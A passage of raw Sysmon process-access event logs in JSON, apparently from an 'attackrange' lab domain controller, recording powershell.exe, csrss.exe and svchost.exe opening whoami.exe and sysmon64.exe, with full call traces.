76c22f0910c41e0ead\\System.Management.Automation.ni.dll+af04f49b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae55ec1c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5bd0eb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5a0750|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5a0750|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5a0750|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5a05e1|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae592566|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae59ea99|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae59e635|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae59e3b5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae59e086|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+af04f49b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae55ec1c","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.674","SourceProcessGUID":"{41C8662E-20CE-5F25-0000-0010A7CC0700}","SourceProcessId":"2456","SourceThreadId":"5028","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20CE-5F25-0000-001007E90700}","TargetProcessId":"1156","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+af0fd2db|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae59e3b5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae59e086|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+af04f49b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae55ec1c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5bd0eb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5a0750|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5a0750|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5a0750|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5a05e1|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae592566|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae59ea99|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae59e635|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae59e3b5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae59e086|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+af04f49b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae55ec1c","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4965,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.674\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20CE-5F25-0000-001007E90700}\r\nTargetProcessId: 1156\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.674","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20CE-5F25-0000-001007E90700}","TargetProcessId":"1156","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4966,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.674\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.674","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4967,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.674\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.674","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4968,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.674\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.674","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4969,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.674\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.674","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4970,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.674\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.674","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4971,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.674\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 